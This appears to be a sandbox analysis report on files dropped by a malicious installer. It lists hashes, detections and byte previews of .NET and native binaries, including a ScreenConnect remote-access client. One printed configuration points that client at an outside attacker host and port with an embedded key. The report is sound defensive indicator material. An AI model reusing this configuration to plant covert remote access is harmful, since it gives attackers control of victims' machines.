                                                                    Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):26722
                                                                    Entropy (8bit):7.7401940386372345
                                                                    Encrypted:false
                                                                    SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                    MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                    SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                    SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                    SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                    Malicious:false
                                                                    Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):197120
                                                                    Entropy (8bit):6.58476728626163
                                                                    Encrypted:false
                                                                    SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                    MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                    SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                    SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                    SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                    Joe Sandbox View:
                                                                    • Filename: , Detection: malicious, Browse
                                                                    • Filename: , Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: setup.msi, Detection: malicious, Browse
                                                                    • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                                    • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                                    • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                    • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                    • Filename: statments.exe, Detection: malicious, Browse
                                                                    • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):68096
                                                                    Entropy (8bit):6.068776675019683
                                                                    Encrypted:false
                                                                    SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                    MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                    SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                    SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                    SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):95520
                                                                    Entropy (8bit):6.505346220942731
                                                                    Encrypted:false
                                                                    SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                    MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                    SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                    SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                    SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 3%, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):548864
                                                                    Entropy (8bit):6.031251664661689
                                                                    Encrypted:false
                                                                    SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                    MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                    SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                    SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                    SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1721856
                                                                    Entropy (8bit):6.639136400085158
                                                                    Encrypted:false
                                                                    SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                    MD5:9F823778701969823C5A01EF3ECE57B7
                                                                    SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                    SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                    SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):260168
                                                                    Entropy (8bit):6.416438906122177
                                                                    Encrypted:false
                                                                    SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                                    MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                    SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                    SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                    SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):61216
                                                                    Entropy (8bit):6.31175789874945
                                                                    Encrypted:false
                                                                    SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                    MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                    SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                    SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                    SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):266
                                                                    Entropy (8bit):4.842791478883622
                                                                    Encrypted:false
                                                                    SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                    MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                    SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                    SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                    SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):601376
                                                                    Entropy (8bit):6.185921191564225
                                                                    Encrypted:false
                                                                    SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                    MD5:20AB8141D958A58AADE5E78671A719BF
                                                                    SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                    SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                    SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):266
                                                                    Entropy (8bit):4.842791478883622
                                                                    Encrypted:false
                                                                    SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                    MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                    SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                    SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                    SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                    Malicious:true
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):842248
                                                                    Entropy (8bit):6.268561504485627
                                                                    Encrypted:false
                                                                    SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                                    MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                                    SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                                    SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                                    SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):81696
                                                                    Entropy (8bit):5.862223562830496
                                                                    Encrypted:false
                                                                    SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                    MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                    SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                    SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                    SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):266
                                                                    Entropy (8bit):4.842791478883622
                                                                    Encrypted:false
                                                                    SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                    MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                    SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                    SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                    SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):3343
                                                                    Entropy (8bit):4.771733209240506
                                                                    Encrypted:false
                                                                    SSDEEP:96:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHlHgHyHNHtH29PtxA2oFHX:opPN
                                                                    MD5:9322751577F16A9DB8C25F7D7EDD7D9F
                                                                    SHA1:DC74AD5A42634655BCBA909DB1E2765F7CDDFB3D
                                                                    SHA-256:F1A3457E307D721EF5B63FDB0D5E13790968276862EF043FB62CCE43204606DF
                                                                    SHA-512:BB0C662285D7B95B7FAA05E9CC8675B81B33E6F77B0C50F97C9BC69D30FB71E72A7EAF0AFC71AF0C646E35B9EADD1E504A35D5D25847A29FD6D557F7ABD903AB
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:XML 1.0 document, ASCII text, with very long lines (449), with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):939
                                                                    Entropy (8bit):5.796466792414452
                                                                    Encrypted:false
                                                                    SSDEEP:24:2dL9hK6E4dl/nuuAnCiCBrxKrlI3ZXfePI9Rp3vH:chh7HHnDAnCPrxKa3lff3v
                                                                    MD5:10ACBCF7D80CC0D8D0D67FF0987D0189
                                                                    SHA1:00E379C7CDFAB98198FFEF891BAD17231262CF66
                                                                    SHA-256:4A4C00DA35C8FB61FF854E9D9916E74CE0433DEC574673C41D70A9374C5C7636
                                                                    SHA-512:6ABBA073E467B6152A6B828B8E07BBC4794656CA6F040CE0D132A717CA483A9E7756B7EDBD414AC9A4A032D31FC1570DE72855A7F35386CB1AE90BC890A1CCD9
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=yell64u.top&amp;p=8880&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):746
                                                                    Entropy (8bit):5.349174276064173
                                                                    Encrypted:false
                                                                    SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                                    MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                                    SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                                    SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                                    SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                                    Malicious:false
